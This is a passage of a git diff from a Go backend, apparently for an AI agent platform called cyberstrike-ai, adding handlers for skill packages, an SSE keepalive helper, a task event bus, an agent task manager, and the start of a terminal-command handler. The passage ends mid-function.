c.JSON(http.StatusOK, gin.H{ + "skill": map[string]interface{}{ + "id": skill.DirName, + "name": skill.Name, + "description": skill.Description, + "content": skill.Content, + "path": skill.Path, + "version": skill.Version, + "tags": skill.Tags, + "scripts": skill.Scripts, + "sections": skill.Sections, + "package_files": skill.PackageFiles, + "file_size": fileSize, + "mod_time": modTime, + "depth": depthStr, + "section": section, + }, + }) +} + +// ListSkillPackageFiles lists all files in a skill directory (Agent Skills layout). +func (h *SkillsHandler) ListSkillPackageFiles(c *gin.Context) { + skillID := c.Param("name") + files, err := skillpackage.ListPackageFiles(h.skillsRootAbs(), skillID) + if err != nil { + c.JSON(http.StatusNotFound, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"files": files}) +} + +// GetSkillPackageFile returns one file by relative path (?path=). +func (h *SkillsHandler) GetSkillPackageFile(c *gin.Context) { + skillID := c.Param("name") + rel := strings.TrimSpace(c.Query("path")) + if rel == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "query path is required"}) + return + } + b, err := skillpackage.ReadPackageFile(h.skillsRootAbs(), skillID, rel, 0) + if err != nil { + c.JSON(http.StatusNotFound, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"path": rel, "content": string(b)}) +} + +// PutSkillPackageFile writes a file inside the skill package. +func (h *SkillsHandler) PutSkillPackageFile(c *gin.Context) { + skillID := c.Param("name") + var req struct { + Path string `json:"path" binding:"required"` + Content string `json:"content"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()}) + return + } + if req.Path == "SKILL.md" { + if err := skillpackage.ValidateSkillMDPackage([]byte(req.Content), skillID); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + } + if err := skillpackage.WritePackageFile(h.skillsRootAbs(), skillID, req.Path, []byte(req.Content)); err != nil { + h.logger.Error("写入 skill 文件失败", zap.String("skill", skillID), zap.String("path", req.Path), zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"message": "saved", "path": req.Path}) +} + +// GetSkillBoundRoles 获取绑定指定skill的角色列表 +func (h *SkillsHandler) GetSkillBoundRoles(c *gin.Context) { + skillName := c.Param("name") + if skillName == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"}) + return + } + + boundRoles := h.getRolesBoundToSkill(skillName) + c.JSON(http.StatusOK, gin.H{ + "skill": skillName, + "bound_roles": boundRoles, + "bound_count": len(boundRoles), + }) +} + +// getRolesBoundToSkill 预留:角色不再配置 skill 绑定,始终返回空列表。 +func (h *SkillsHandler) getRolesBoundToSkill(skillName string) []string { + _ = skillName + return nil +} + +// CreateSkill 创建新 skill(标准 Agent Skills:生成 SKILL.md + YAML front matter) +func (h *SkillsHandler) CreateSkill(c *gin.Context) { + var req struct { + Name string `json:"name" binding:"required"` + Description string `json:"description" binding:"required"` + Content string `json:"content" binding:"required"` + } + + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()}) + return + } + + if !isValidSkillName(req.Name) { + c.JSON(http.StatusBadRequest, gin.H{"error": "skill 目录名须为小写字母、数字、连字符(与 Agent Skills name 一致)"}) + return + } + + manifest := &skillpackage.SkillManifest{ + Name: req.Name, + Description: strings.TrimSpace(req.Description), + } + skillMD, err := skillpackage.BuildSkillMD(manifest, req.Content) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if err := skillpackage.ValidateSkillMDPackage(skillMD, req.Name); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + skillDir := filepath.Join(h.skillsRootAbs(), req.Name) + if err := os.MkdirAll(skillDir, 0755); err != nil { + h.logger.Error("创建skill目录失败", zap.String("skill", req.Name), zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "创建skill目录失败: " + err.Error()}) + return + } + + if _, err := os.Stat(filepath.Join(skillDir, "SKILL.md")); err == nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "skill已存在"}) + return + } + + if err := os.WriteFile(filepath.Join(skillDir, "SKILL.md"), skillMD, 0644); err != nil { + h.logger.Error("创建 SKILL.md 失败", zap.String("skill", req.Name), zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "创建 SKILL.md 失败: " + err.Error()}) + return + } + + h.logger.Info("创建skill成功", zap.String("skill", req.Name)) + if h.audit != nil { + h.audit.RecordOK(c, "skill", "create", "创建 Skill", "skill", req.Name, nil) + } + c.JSON(http.StatusOK, gin.H{ + "message": "skill已创建", + "skill": map[string]interface{}{ + "name": req.Name, + "path": skillDir, + }, + }) +} + +// UpdateSkill 更新 SKILL.md(保留 front matter 中除 description 外的字段;可选覆盖 description) +func (h *SkillsHandler) UpdateSkill(c *gin.Context) { + skillName := c.Param("name") + if skillName == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"}) + return + } + + var req struct { + Description string `json:"description"` + Content string `json:"content" binding:"required"` + } + + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()}) + return + } + + mdPath := filepath.Join(h.skillsRootAbs(), skillName, "SKILL.md") + raw, err := os.ReadFile(mdPath) + if err != nil { + c.JSON(http.StatusNotFound, gin.H{"error": "skill不存在: " + err.Error()}) + return + } + m, _, err := skillpackage.ParseSkillMD(raw) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + if req.Description != "" { + m.Description = strings.TrimSpace(req.Description) + } + skillMD, err := skillpackage.BuildSkillMD(m, req.Content) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if err := skillpackage.ValidateSkillMDPackage(skillMD, skillName); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + skillDir := filepath.Join(h.skillsRootAbs(), skillName) + + if err := os.WriteFile(filepath.Join(skillDir, "SKILL.md"), skillMD, 0644); err != nil { + h.logger.Error("更新 SKILL.md 失败", zap.String("skill", skillName), zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "更新 SKILL.md 失败: " + err.Error()}) + return + } + + h.logger.Info("更新skill成功", zap.String("skill", skillName)) + if h.audit != nil { + h.audit.RecordOK(c, "skill", "update", "更新 Skill", "skill", skillName, nil) + } + c.JSON(http.StatusOK, gin.H{ + "message": "skill已更新", + }) +} + +// DeleteSkill 删除skill +func (h *SkillsHandler) DeleteSkill(c *gin.Context) { + skillName := c.Param("name") + if skillName == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"}) + return + } + + // 检查是否有角色绑定了该skill,如果有则自动移除绑定 + affectedRoles := h.removeSkillFromRoles(skillName) + if len(affectedRoles) > 0 { + h.logger.Info("从角色中移除skill绑定", + zap.String("skill", skillName), + zap.Strings("roles", affectedRoles)) + } + + skillDir := filepath.Join(h.skillsRootAbs(), skillName) + if err := os.RemoveAll(skillDir); err != nil { + h.logger.Error("删除skill失败", zap.String("skill", skillName), zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "删除skill失败: " + err.Error()}) + return + } + responseMsg := "skill已删除" + if len(affectedRoles) > 0 { + responseMsg = fmt.Sprintf("skill已删除,已自动从 %d 个角色中移除绑定: %s", + len(affectedRoles), strings.Join(affectedRoles, ", ")) + } + + h.logger.Info("删除skill成功", zap.String("skill", skillName)) + if h.audit != nil { + h.audit.RecordOK(c, "skill", "delete", "删除 Skill", "skill", skillName, map[string]interface{}{ + "affected_roles": affectedRoles, + }) + } + c.JSON(http.StatusOK, gin.H{ + "message": responseMsg, + "affected_roles": affectedRoles, + }) +} + +// GetSkillStats 获取skills调用统计信息 +func (h *SkillsHandler) GetSkillStats(c *gin.Context) { + skillList, err := skillpackage.ListSkillDirNames(h.skillsRootAbs()) + if err != nil { + h.logger.Error("获取skills列表失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + skillsDir := h.skillsRootAbs() + + // 从数据库加载调用统计 + var skillStatsMap map[string]*database.SkillStats + if h.db != nil { + dbStats, err := h.db.LoadSkillStats() + if err != nil { + h.logger.Warn("从数据库加载Skills统计信息失败", zap.Error(err)) + skillStatsMap = make(map[string]*database.SkillStats) + } else { + skillStatsMap = dbStats + } + } else { + skillStatsMap = make(map[string]*database.SkillStats) + } + + // 构建统计信息(包含所有skills,即使没有调用记录) + statsList := make([]map[string]interface{}, 0, len(skillList)) + totalCalls := 0 + totalSuccess := 0 + totalFailed := 0 + + for _, skillName := range skillList { + stat, exists := skillStatsMap[skillName] + if !exists { + stat = &database.SkillStats{ + SkillName: skillName, + TotalCalls: 0, + SuccessCalls: 0, + FailedCalls: 0, + } + } + + totalCalls += stat.TotalCalls + totalSuccess += stat.SuccessCalls + totalFailed += stat.FailedCalls + + lastCallTimeStr := "" + if stat.LastCallTime != nil { + lastCallTimeStr = stat.LastCallTime.Format("2006-01-02 15:04:05") + } + + statsList = append(statsList, map[string]interface{}{ + "skill_name": stat.SkillName, + "total_calls": stat.TotalCalls, + "success_calls": stat.SuccessCalls, + "failed_calls": stat.FailedCalls, + "last_call_time": lastCallTimeStr, + }) + } + + c.JSON(http.StatusOK, gin.H{ + "total_skills": len(skillList), + "total_calls": totalCalls, + "total_success": totalSuccess, + "total_failed": totalFailed, + "skills_dir": skillsDir, + "stats": statsList, + }) +} + +// ClearSkillStats 清空所有Skills统计信息 +func (h *SkillsHandler) ClearSkillStats(c *gin.Context) { + if h.db == nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "数据库连接未配置"}) + return + } + + if err := h.db.ClearSkillStats(); err != nil { + h.logger.Error("清空Skills统计信息失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "清空统计信息失败: " + err.Error()}) + return + } + + h.logger.Info("已清空所有Skills统计信息") + c.JSON(http.StatusOK, gin.H{ + "message": "已清空所有Skills统计信息", + }) +} + +// ClearSkillStatsByName 清空指定skill的统计信息 +func (h *SkillsHandler) ClearSkillStatsByName(c *gin.Context) { + skillName := c.Param("name") + if skillName == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"}) + return + } + + if h.db == nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "数据库连接未配置"}) + return + } + + if err := h.db.ClearSkillStatsByName(skillName); err != nil { + h.logger.Error("清空指定skill统计信息失败", zap.String("skill", skillName), zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "清空统计信息失败: " + err.Error()}) + return + } + + h.logger.Info("已清空指定skill统计信息", zap.String("skill", skillName)) + c.JSON(http.StatusOK, gin.H{ + "message": fmt.Sprintf("已清空skill '%s' 的统计信息", skillName), + }) +} + +// removeSkillFromRoles 预留:角色不再存储 skill 绑定,无操作。 +func (h *SkillsHandler) removeSkillFromRoles(skillName string) []string { + _ = skillName + return nil +} + +// saveRolesConfig 保存角色配置到文件(从SkillsHandler调用) +func (h *SkillsHandler) saveRolesConfig() error { + configDir := filepath.Dir(h.configPath) + rolesDir := h.config.RolesDir + if rolesDir == "" { + rolesDir = "roles" // 默认目录 + } + + // 如果是相对路径,相对于配置文件所在目录 + if !filepath.IsAbs(rolesDir) { + rolesDir = filepath.Join(configDir, rolesDir) + } + + // 确保目录存在 + if err := os.MkdirAll(rolesDir, 0755); err != nil { + return fmt.Errorf("创建角色目录失败: %w", err) + } + + // 保存每个角色到独立的文件 + if h.config.Roles != nil { + for roleName, role := range h.config.Roles { + // 确保角色名称正确设置 + if role.Name == "" { + role.Name = roleName + } + + // 使用角色名称作为文件名(安全化文件名,避免特殊字符) + safeFileName := sanitizeRoleFileName(role.Name) + roleFile := filepath.Join(rolesDir, safeFileName+".yaml") + + // 将角色配置序列化为YAML + roleData, err := yaml.Marshal(&role) + if err != nil { + h.logger.Error("序列化角色配置失败", zap.String("role", roleName), zap.Error(err)) + continue + } + + // 处理icon字段:确保包含\U的icon值被引号包围(YAML需要引号才能正确解析Unicode转义) + roleDataStr := string(roleData) + if role.Icon != "" && strings.HasPrefix(role.Icon, "\\U") { + // 匹配 icon: \UXXXXXXXX 格式(没有引号),排除已经有引号的情况 + re := regexp.MustCompile(`(?m)^(icon:\s+)(\\U[0-9A-F]{8})(\s*)$`) + roleDataStr = re.ReplaceAllString(roleDataStr, `${1}"${2}"${3}`) + roleData = []byte(roleDataStr) + } + + // 写入文件 + if err := os.WriteFile(roleFile, roleData, 0644); err != nil { + h.logger.Error("保存角色配置文件失败", zap.String("role", roleName), zap.String("file", roleFile), zap.Error(err)) + continue + } + + h.logger.Info("角色配置已保存到文件", zap.String("role", roleName), zap.String("file", roleFile)) + } + } + + return nil +} + +// sanitizeRoleFileName 将角色名称转换为安全的文件名 +func sanitizeRoleFileName(name string) string { + // 替换可能不安全的字符 + replacer := map[rune]string{ + '/': "_", + '\\': "_", + ':': "_", + '*': "_", + '?': "_", + '"': "_", + '<': "_", + '>': "_", + '|': "_", + ' ': "_", + } + + var result []rune + for _, r := range name { + if replacement, ok := replacer[r]; ok { + result = append(result, []rune(replacement)...) + } else { + result = append(result, r) + } + } + + fileName := string(result) + // 如果文件名为空,使用默认名称 + if fileName == "" { + fileName = "role" + } + + return fileName +} + +// isValidSkillName 验证 skill 目录名(与 Agent Skills 的 name 字段一致:小写、数字、连字符) +func isValidSkillName(name string) bool { + if name == "" || len(name) > 100 { + return false + } + for _, r := range name { + if !((r >= 'a' && r <= 'z') || (r >= '0' && r <= '9') || r == '-') { + return false + } + } + return true +} diff --git a/internal/handler/sse_keepalive.go b/internal/handler/sse_keepalive.go new file mode 100644 index 00000000..ae750ecd --- /dev/null +++ b/internal/handler/sse_keepalive.go @@ -0,0 +1,58 @@ +package handler + +import ( + "fmt" + "net/http" + "sync" + "time" + + "github.com/gin-gonic/gin" +) + +// sseInterval is how often we write on long SSE streams. Shorter intervals help NATs and +// some proxies that treat connections as idle; 10s is a reasonable balance with traffic. +const sseKeepaliveInterval = 10 * time.Second + +// sseKeepalive sends periodic SSE traffic so proxies (e.g. nginx proxy_read_timeout), NATs, +// and load balancers do not close long-running streams. Some intermediaries ignore comment-only +// lines, so we send both a comment and a minimal data frame (type heartbeat) per tick. +// +// writeMu must be the same mutex used by sendEvent for this request: concurrent writes to +// http.ResponseWriter break chunked transfer encoding (browser: net::ERR_INVALID_CHUNKED_ENCODING). +func sseKeepalive(c *gin.Context, stop <-chan struct{}, writeMu *sync.Mutex) { + if writeMu == nil { + return + } + ticker := time.NewTicker(sseKeepaliveInterval) + defer ticker.Stop() + for { + select { + case <-stop: + return + case <-c.Request.Context().Done(): + return + case <-ticker.C: + select { + case <-stop: + return + case <-c.Request.Context().Done(): + return + default: + } + writeMu.Lock() + if _, err := fmt.Fprintf(c.Writer, ": keepalive\n\n"); err != nil { + writeMu.Unlock() + return + } + // data: frame so strict proxies still see downstream bytes (comments alone may not reset timers) + if _, err := fmt.Fprintf(c.Writer, `data: {"type":"heartbeat"}`+"\n\n"); err != nil { + writeMu.Unlock() + return + } + if flusher, ok := c.Writer.(http.Flusher); ok { + flusher.Flush() + } + writeMu.Unlock() + } + } +} diff --git a/internal/handler/task_event_bus.go b/internal/handler/task_event_bus.go new file mode 100644 index 00000000..bf2ad880 --- /dev/null +++ b/internal/handler/task_event_bus.go @@ -0,0 +1,116 @@ +package handler + +import "sync" + +// TaskEventBus 将主 SSE 连接上的事件镜像给后订阅的客户端(例如刷新页面后、HITL 审批通过需继续收事件)。 +// 每个 payload 为完整 SSE 行: "data: {...}\n\n" +type TaskEventBus struct { + mu sync.RWMutex + subs map[string]map[*taskEventSub]struct{} +} + +type taskEventSub struct { + mu sync.Mutex + ch chan []byte + closed bool +} + +func (s *taskEventSub) sendNonBlocking(line []byte) bool { + if s == nil { + return false + } + s.mu.Lock() + defer s.mu.Unlock() + if s.closed { + return false + } + select { + case s.ch <- line: + return true + default: + return false + } +} + +func (s *taskEventSub) closeOnce() { + if s == nil { + return + } + s.mu.Lock() + defer s.mu.Unlock() + if s.closed { + return + } + s.closed = true + close(s.ch) +} + +func NewTaskEventBus() *TaskEventBus { + return &TaskEventBus{ + subs: make(map[string]map[*taskEventSub]struct{}), + } +} + +// Subscribe 注册订阅;cancel 时需调用 Unsubscribe。 +func (b *TaskEventBus) Subscribe(conversationID string) (sub *taskEventSub, ch <-chan []byte) { + chBuf := make(chan []byte, 256) + sub = &taskEventSub{ch: chBuf} + b.mu.Lock() + if b.subs[conversationID] == nil { + b.subs[conversationID] = make(map[*taskEventSub]struct{}) + } + b.subs[conversationID][sub] = struct{}{} + b.mu.Unlock() + return sub, chBuf +} + +func (b *TaskEventBus) Unsubscribe(conversationID string, sub *taskEventSub) { + if sub == nil { + return + } + b.mu.Lock() + m, ok := b.subs[conversationID] + if !ok { + b.mu.Unlock() + return + } + delete(m, sub) + if len(m) == 0 { + delete(b.subs, conversationID) + } + b.mu.Unlock() + sub.closeOnce() +} + +// Publish 非阻塞投递;慢消费者丢帧(HITL 场景以最新状态为准,丢帧可接受)。 +func (b *TaskEventBus) Publish(conversationID string, line []byte) { + if b == nil || conversationID == "" || len(line) == 0 { + return + } + b.mu.RLock() + m := b.subs[conversationID] + subs := make([]*taskEventSub, 0, len(m)) + for s := range m { + subs = append(subs, s) + } + b.mu.RUnlock() + + cp := append([]byte(nil), line...) + for _, s := range subs { + s.sendNonBlocking(cp) + } +} + +// CloseConversation 任务结束时关闭该会话所有订阅 channel。 +func (b *TaskEventBus) CloseConversation(conversationID string) { + if b == nil || conversationID == "" { + return + } + b.mu.Lock() + m := b.subs[conversationID] + delete(b.subs, conversationID) + b.mu.Unlock() + for sub := range m { + sub.closeOnce() + } +} diff --git a/internal/handler/task_manager.go b/internal/handler/task_manager.go new file mode 100644 index 00000000..82e9f304 --- /dev/null +++ b/internal/handler/task_manager.go @@ -0,0 +1,407 @@ +package handler + +import ( + "context" + "errors" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/multiagent" +) + +// ErrTaskCancelled 用户取消任务的错误 +var ErrTaskCancelled = errors.New("agent task cancelled by user") + +// ErrTaskAlreadyRunning 会话已有任务正在执行 +var ErrTaskAlreadyRunning = errors.New("agent task already running for conversation") + +// shouldPersistEinoAgentTraceAfterRunError:Eino 相关 Run 非成功返回时,是否仍写入 last_react_* 供下轮 loadHistoryFromAgentTrace。 +// 当前策略:无论正常结束、异常结束或用户主动停止,都尽量保留最后可用轨迹, +// 以便在同一会话继续时可基于原始上下文续跑,而不是回退到仅消息文本历史。 +func shouldPersistEinoAgentTraceAfterRunError(baseCtx context.Context) bool { + return true +} + +// AgentTask 描述正在运行的Agent任务 +type AgentTask struct { + ConversationID string `json:"conversationId"` + Message string `json:"message,omitempty"` + StartedAt time.Time `json:"startedAt"` + Status string `json:"status"` + CancellingAt time.Time `json:"-"` // 进入 cancelling 状态的时间,用于清理长时间卡住的任务 + + // ActiveMCPExecutionID 当前正在执行的 MCP 工具 executionId(仅内存,供「中断并继续」= 仅掐当前工具) + ActiveMCPExecutionID string `json:"-"` + + // InterruptContinueNote 无 MCP 时「中断并继续」由用户在弹窗中填写的补充说明(Cancel 前写入,续跑轮次读取后清空) + InterruptContinueNote string `json:"-"` + + cancel func(error) +} + +// RegisterRunningTool 实现 mcp.ToolRunRegistry:工具开始时登记本会话当前 executionId。 +func (m *AgentTaskManager) RegisterRunningTool(conversationID, executionID string) { + conversationID = strings.TrimSpace(conversationID) + executionID = strings.TrimSpace(executionID) + if conversationID == "" || executionID == "" { + return + } + m.mu.Lock() + defer m.mu.Unlock() + if t, ok := m.tasks[conversationID]; ok && t != nil { + t.ActiveMCPExecutionID = executionID + } +} + +// UnregisterRunningTool 工具结束时清除登记(仅当 id 仍匹配时清除,避免并发串单)。 +func (m *AgentTaskManager) UnregisterRunningTool(conversationID, executionID string) { + conversationID = strings.TrimSpace(conversationID) + executionID = strings.TrimSpace(executionID) + if conversationID == "" || executionID == "" { + return + } + m.mu.Lock() + defer m.mu.Unlock() + if t, ok := m.tasks[conversationID]; ok && t != nil { + if t.ActiveMCPExecutionID == executionID { + t.ActiveMCPExecutionID = "" + } + } +} + +// SetInterruptContinueNote 在发起 ErrInterruptContinue 取消前写入用户补充说明(仅内存)。 +func (m *AgentTaskManager) SetInterruptContinueNote(conversationID, note string) { + conversationID = strings.TrimSpace(conversationID) + if conversationID == "" { + return + } + m.mu.Lock() + defer m.mu.Unlock() + if t, ok := m.tasks[conversationID]; ok && t != nil { + t.InterruptContinueNote = note + } +} + +// TakeInterruptContinueNote 读取并清空补充说明(续跑开始时调用一次)。 +func (m *AgentTaskManager) TakeInterruptContinueNote(conversationID string) string { + conversationID = strings.TrimSpace(conversationID) + if conversationID == "" { + return "" + } + m.mu.Lock() + defer m.mu.Unlock() + if t, ok := m.tasks[conversationID]; ok && t != nil { + n := t.InterruptContinueNote + t.InterruptContinueNote = "" + return n + } + return "" +} + +// BindTaskCancel 在同一运行任务内替换与 context 绑定的 cancel 函数(用于中断后继续时换新 baseCtx)。 +func (m *AgentTaskManager) BindTaskCancel(conversationID string, cancel context.CancelCauseFunc) { + conversationID = strings.TrimSpace(conversationID) + if conversationID == "" || cancel == nil { + return + } + m.mu.Lock() + defer m.mu.Unlock() + if t, ok := m.tasks[conversationID]; ok && t != nil { + t.cancel = func(err error) { + cancel(err) + } + } +} + +// ActiveMCPExecutionID 返回当前会话进行中的工具 executionId,无则空串。 +func (m *AgentTaskManager) ActiveMCPExecutionID(conversationID string) string { + conversationID = strings.TrimSpace(conversationID) + if conversationID == "" { + return "" + } + m.mu.RLock() + defer m.mu.RUnlock() + if t, ok := m.tasks[conversationID]; ok && t != nil { + return strings.TrimSpace(t.ActiveMCPExecutionID) + } + return "" +} + +// CompletedTask 已完成的任务(用于历史记录) +type CompletedTask struct { + ConversationID string `json:"conversationId"` + Message string `json:"message,omitempty"` + StartedAt time.Time `json:"startedAt"` + CompletedAt time.Time `json:"completedAt"` + Status string `json:"status"` +} + +// AgentTaskManager 管理正在运行的Agent任务 +type AgentTaskManager struct { + mu sync.RWMutex + tasks map[string]*AgentTask + completedTasks []*CompletedTask // 最近完成的任务历史 + maxHistorySize int // 最大历史记录数 + historyRetention time.Duration // 历史记录保留时间 + eventBus *TaskEventBus // 可选:任务结束时关闭镜像 SSE 订阅 +} + +const ( + // cancellingStuckThreshold 处于「取消中」超过此时长则强制从运行列表移除。正常取消会在当前步骤内返回, + // 超过则视为卡住,尽快释放会话。常见做法多为 30–60s 内释放。 + cancellingStuckThreshold = 45 * time.Second + // cancellingStuckThresholdLegacy 未记录 CancellingAt 时用 StartedAt 判断的兜底时长 + cancellingStuckThresholdLegacy = 2 * time.Minute + cleanupInterval = 15 * time.Second // 与上面阈值配合,最长约 60s 内移除 +) + +// NewAgentTaskManager 创建任务管理器 +func NewAgentTaskManager() *AgentTaskManager { + m := &AgentTaskManager{ + tasks: make(map[string]*AgentTask), + completedTasks: make([]*CompletedTask, 0), + maxHistorySize: 50, // 最多保留50条历史记录 + historyRetention: 24 * time.Hour, // 保留24小时 + } + go m.runStuckCancellingCleanup() + return m +} + +// SetTaskEventBus 设置任务事件总线(与 AgentHandler 共用同一实例)。 +func (m *AgentTaskManager) SetTaskEventBus(b *TaskEventBus) { + m.mu.Lock() + defer m.mu.Unlock() + m.eventBus = b +} + +// GetTask 返回运行中任务(无则 nil)。 +func (m *AgentTaskManager) GetTask(conversationID string) *AgentTask { + m.mu.RLock() + defer m.mu.RUnlock() + return m.tasks[conversationID] +} + +// runStuckCancellingCleanup 定期将长时间处于「取消中」的任务强制结束,避免卡住无法发新消息 +func (m *AgentTaskManager) runStuckCancellingCleanup() { + ticker := time.NewTicker(cleanupInterval) + defer ticker.Stop() + for range ticker.C { + m.cleanupStuckCancelling() + } +} + +func (m *AgentTaskManager) cleanupStuckCancelling() { + m.mu.Lock() + var toFinish []string + now := time.Now() + for id, task := range m.tasks { + if task.Status != "cancelling" { + continue + } + var elapsed time.Duration + if !task.CancellingAt.IsZero() { + elapsed = now.Sub(task.CancellingAt) + if elapsed < cancellingStuckThreshold { + continue + } + } else { + elapsed = now.Sub(task.StartedAt) + if elapsed < cancellingStuckThresholdLegacy { + continue + } + } + toFinish = append(toFinish, id) + } + m.mu.Unlock() + for _, id := range toFinish { + m.FinishTask(id, "cancelled") + } +} + +// StartTask 注册并开始一个新的任务 +func (m *AgentTaskManager) StartTask(conversationID, message string, cancel context.CancelCauseFunc) (*AgentTask, error) { + m.mu.Lock() + defer m.mu.Unlock() + + if _, exists := m.tasks[conversationID]; exists { + return nil, ErrTaskAlreadyRunning + } + + task := &AgentTask{ + ConversationID: conversationID, + Message: message, + StartedAt: time.Now(), + Status: "running", + cancel: func(err error) { + if cancel != nil { + cancel(err) + } + }, + } + + m.tasks[conversationID] = task + return task, nil +} + +// CancelTask 取消指定会话的任务。若任务已在取消中,仍返回 (true, nil) 以便接口幂等、前端不报错。 +func (m *AgentTaskManager) CancelTask(conversationID string, cause error) (bool, error) { + m.mu.Lock() + task, exists := m.tasks[conversationID] + if !exists { + m.mu.Unlock() + return false, nil + } + + // 如果已经处于取消流程,视为成功(幂等),避免前端重复点击报「未找到任务」 + if task.Status == "cancelling" { + m.mu.Unlock() + return true, nil + } + + // ErrInterruptContinue:仅掐断当前推理步骤,随后由处理器续跑,不进入长时间「取消中」态。 + if cause != nil && errors.Is(cause, multiagent.ErrInterruptContinue) { + task.Status = "running" + } else { + task.Status = "cancelling" + task.CancellingAt = time.Now() + } + if cause != nil && errors.Is(cause, ErrTaskCancelled) { + task.InterruptContinueNote = "" + } + cancel := task.cancel + m.mu.Unlock() + + if cause == nil { + cause = ErrTaskCancelled + } + if cancel != nil { + cancel(cause) + } + return true, nil +} + +// UpdateTaskStatus 更新任务状态但不删除任务(用于在发送事件前更新状态) +func (m *AgentTaskManager) UpdateTaskStatus(conversationID string, status string) { + m.mu.Lock() + defer m.mu.Unlock() + + task, exists := m.tasks[conversationID] + if !exists { + return + } + + if status != "" { + task.Status = status + } +} + +// FinishTask 完成任务并从管理器中移除 +func (m *AgentTaskManager) FinishTask(conversationID string, finalStatus string) { + m.mu.Lock() + task, exists := m.tasks[conversationID] + if !exists { + m.mu.Unlock() + return + } + + if finalStatus != "" { + task.Status = finalStatus + } + + // 保存到历史记录 + completedTask := &CompletedTask{ + ConversationID: task.ConversationID, + Message: task.Message, + StartedAt: task.StartedAt, + CompletedAt: time.Now(), + Status: finalStatus, + } + + // 添加到历史记录 + m.completedTasks = append(m.completedTasks, completedTask) + + // 清理过期和过多的历史记录 + m.cleanupHistory() + + // 从运行任务中移除 + delete(m.tasks, conversationID) + bus := m.eventBus + m.mu.Unlock() + if bus != nil { + bus.CloseConversation(conversationID) + } +} + +// cleanupHistory 清理过期的历史记录 +func (m *AgentTaskManager) cleanupHistory() { + now := time.Now() + cutoffTime := now.Add(-m.historyRetention) + + // 过滤掉过期的记录 + validTasks := make([]*CompletedTask, 0, len(m.completedTasks)) + for _, task := range m.completedTasks { + if task.CompletedAt.After(cutoffTime) { + validTasks = append(validTasks, task) + } + } + + // 如果仍然超过最大数量,只保留最新的 + if len(validTasks) > m.maxHistorySize { + // 按完成时间排序,保留最新的 + // 由于是追加的,最新的在最后,所以直接取最后N个 + start := len(validTasks) - m.maxHistorySize + validTasks = validTasks[start:] + } + + m.completedTasks = validTasks +} + +// GetActiveTasks 返回所有正在运行的任务 +func (m *AgentTaskManager) GetActiveTasks() []*AgentTask { + m.mu.RLock() + defer m.mu.RUnlock() + + result := make([]*AgentTask, 0, len(m.tasks)) + for _, task := range m.tasks { + result = append(result, &AgentTask{ + ConversationID: task.ConversationID, + Message: task.Message, + StartedAt: task.StartedAt, + Status: task.Status, + }) + } + return result +} + +// GetCompletedTasks 返回最近完成的任务历史 +func (m *AgentTaskManager) GetCompletedTasks() []*CompletedTask { + m.mu.RLock() + defer m.mu.RUnlock() + + // 清理过期记录(只读锁,不影响其他操作) + // 注意:这里不能直接调用cleanupHistory,因为需要写锁 + // 所以返回时过滤过期记录 + now := time.Now() + cutoffTime := now.Add(-m.historyRetention) + + result := make([]*CompletedTask, 0, len(m.completedTasks)) + for _, task := range m.completedTasks { + if task.CompletedAt.After(cutoffTime) { + result = append(result, task) + } + } + + // 按完成时间倒序排序(最新的在前) + // 由于是追加的,最新的在最后,需要反转 + for i, j := 0, len(result)-1; i < j; i, j = i+1, j-1 { + result[i], result[j] = result[j], result[i] + } + + // 限制返回数量 + if len(result) > m.maxHistorySize { + result = result[:m.maxHistorySize] + } + + return result +} diff --git a/internal/handler/terminal.go b/internal/handler/terminal.go new file mode 100644 index 00000000..3c3c53fb --- /dev/null +++ b/internal/handler/terminal.go @@ -0,0 +1,257 @@ +package handler + +import ( + "bytes" + "context" + "encoding/json" + "net/http" + "os" + "os/exec" + "path/filepath" + "runtime" + "strings" + "time" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +const ( + terminalMaxCommandLen = 4096 + terminalMaxOutputLen = 256 * 1024 // 256KB + terminalTimeout = 30 * time.Minute +) + +// TerminalHandler 处理系统设置中的终端命令执行 +type TerminalHandler struct { + logger *zap.Logger +} + +// maskTerminalCommand 对可能包含敏感信息的终端命令做脱敏,避免在日志中直接记录密码等内容 +func maskTerminalCommand(cmd string) string { + trimmed := strings.TrimSpace(cmd) + lower := strings.ToLower(trimmed) + if strings.Contains(lower, "sudo") || strings.Contains(lower, "password") { + return "[masked sensitive terminal command]" + } + if len(trimmed) > 256 { + return trimmed[:256] + "..." + } 